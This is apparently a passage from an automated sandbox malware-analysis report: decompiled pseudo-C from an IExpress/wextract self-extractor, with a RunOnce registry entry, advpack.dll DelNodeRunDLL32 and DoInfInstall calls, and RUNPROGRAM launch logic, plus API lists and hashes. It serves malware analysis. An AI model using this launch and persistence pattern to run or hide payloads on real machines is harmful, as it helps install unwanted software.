                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00A9658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xa991e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xa991e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa991e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xa98580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00A9171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00A944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00A9658A( &_v268, 0x104, 0xa91140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xa98530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00a92220
                                                                                                                                                                                                        0x00a92222
                                                                                                                                                                                                        0x00a92223
                                                                                                                                                                                                        0x00a92229
                                                                                                                                                                                                        0x00a9223d
                                                                                                                                                                                                        0x00a92249
                                                                                                                                                                                                        0x00a92250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92250
                                                                                                                                                                                                        0x00a921d2
                                                                                                                                                                                                        0x00a921d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a921d9
                                                                                                                                                                                                        0x00a9213a
                                                                                                                                                                                                        0x00a92141
                                                                                                                                                                                                        0x00a92144
                                                                                                                                                                                                        0x00a9214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92163
                                                                                                                                                                                                        0x00a92172
                                                                                                                                                                                                        0x00a92172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92163
                                                                                                                                                                                                        0x00a920ea
                                                                                                                                                                                                        0x00a920f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A9205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A9208C
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A92134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A9215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A9218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A9223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 178549006-3765599613
                                                                                                                                                                                                        • Opcode ID: 7a8037fad7775c6b054094d6ca000f2678e5f79f26098919c2965051e077c554
                                                                                                                                                                                                        • Instruction ID: f841b6efb795bfe8219742bb1244300f354a4444d5ed182c06a81c93bb212e31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a8037fad7775c6b054094d6ca000f2678e5f79f26098919c2965051e077c554
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C510775B00214BBDF20DBA4DC49FFB77BCEB55700F1002AAB909E6150DE759D4A8B90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph (function 00A93BA2; graph not reproduced; legend: Executed, Not Executed)
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A93BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xa99124 =  *0xa99124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xa98a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0xa98c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E00A9468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0xa99124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E00A91AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E00A96CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E00A93FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0xa98580;
                                                                                                                                                                                                        													if( *0xa98580 != 0) {
                                                                                                                                                                                                        														E00A92267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0xa98180;
                                                                                                                                                                                                        											if( *0xa98180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E00A944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xa99124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xa99a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00A96495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E00A944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xa99124 = E00A96285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E00A944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xa98a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xa99a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xa98a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xa99154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xa991e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xa98a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xa99a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xa98d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xa99a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xa9a288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xa99124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xa99a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xa98a20;
                                                                                                                                                                                                        										if( *0xa98a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E00A9202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E00A9468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xa98c42;
                                                                                                                                                                                                        									if( *0xa98c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xa98a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00A9468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00A9468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00A91781( &_v276, 0x104, _t130, 0xa98c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E00A9468F(_t130, 0xa99a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                        0x00a93e56
                                                                                                                                                                                                        0x00a93e5c
                                                                                                                                                                                                        0x00a93e61
                                                                                                                                                                                                        0x00a93e68
                                                                                                                                                                                                        0x00a93e70
                                                                                                                                                                                                        0x00a93e74
                                                                                                                                                                                                        0x00a93e7c
                                                                                                                                                                                                        0x00a93e80
                                                                                                                                                                                                        0x00a93e82
                                                                                                                                                                                                        0x00a93e82
                                                                                                                                                                                                        0x00a93e87
                                                                                                                                                                                                        0x00a93e87
                                                                                                                                                                                                        0x00a93e8b
                                                                                                                                                                                                        0x00a93e91
                                                                                                                                                                                                        0x00a93e94
                                                                                                                                                                                                        0x00a93e96
                                                                                                                                                                                                        0x00a93e96
                                                                                                                                                                                                        0x00a93e9b
                                                                                                                                                                                                        0x00a93e9b
                                                                                                                                                                                                        0x00a93e9f
                                                                                                                                                                                                        0x00a93ea2
                                                                                                                                                                                                        0x00a93ea4
                                                                                                                                                                                                        0x00a93ea4
                                                                                                                                                                                                        0x00a93ea9
                                                                                                                                                                                                        0x00a93ea9
                                                                                                                                                                                                        0x00a93ead
                                                                                                                                                                                                        0x00a93eb3
                                                                                                                                                                                                        0x00a93eb6
                                                                                                                                                                                                        0x00a93eb8
                                                                                                                                                                                                        0x00a93eb8
                                                                                                                                                                                                        0x00a93ebd
                                                                                                                                                                                                        0x00a93ebd
                                                                                                                                                                                                        0x00a93ec1
                                                                                                                                                                                                        0x00a93ec3
                                                                                                                                                                                                        0x00a93ec5
                                                                                                                                                                                                        0x00a93ec5
                                                                                                                                                                                                        0x00a93eca
                                                                                                                                                                                                        0x00a93eca
                                                                                                                                                                                                        0x00a93ece
                                                                                                                                                                                                        0x00a93ed5
                                                                                                                                                                                                        0x00a93ed9
                                                                                                                                                                                                        0x00a93ee0
                                                                                                                                                                                                        0x00a93ee6
                                                                                                                                                                                                        0x00a93eea
                                                                                                                                                                                                        0x00a93eec
                                                                                                                                                                                                        0x00a93eee
                                                                                                                                                                                                        0x00a93ef3
                                                                                                                                                                                                        0x00a93ef3
                                                                                                                                                                                                        0x00a93ef5
                                                                                                                                                                                                        0x00a93efa
                                                                                                                                                                                                        0x00a93efb
                                                                                                                                                                                                        0x00a93efd
                                                                                                                                                                                                        0x00a93f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93eff
                                                                                                                                                                                                        0x00a93eff
                                                                                                                                                                                                        0x00a93f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93f05
                                                                                                                                                                                                        0x00a93efd
                                                                                                                                                                                                        0x00a93dc7
                                                                                                                                                                                                        0x00a93dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93dd0
                                                                                                                                                                                                        0x00a93dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93dd9
                                                                                                                                                                                                        0x00a93ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ddd
                                                                                                                                                                                                        0x00a93de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93de1
                                                                                                                                                                                                        0x00a93d59
                                                                                                                                                                                                        0x00a93d65
                                                                                                                                                                                                        0x00a93d6a
                                                                                                                                                                                                        0x00a93d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d6e
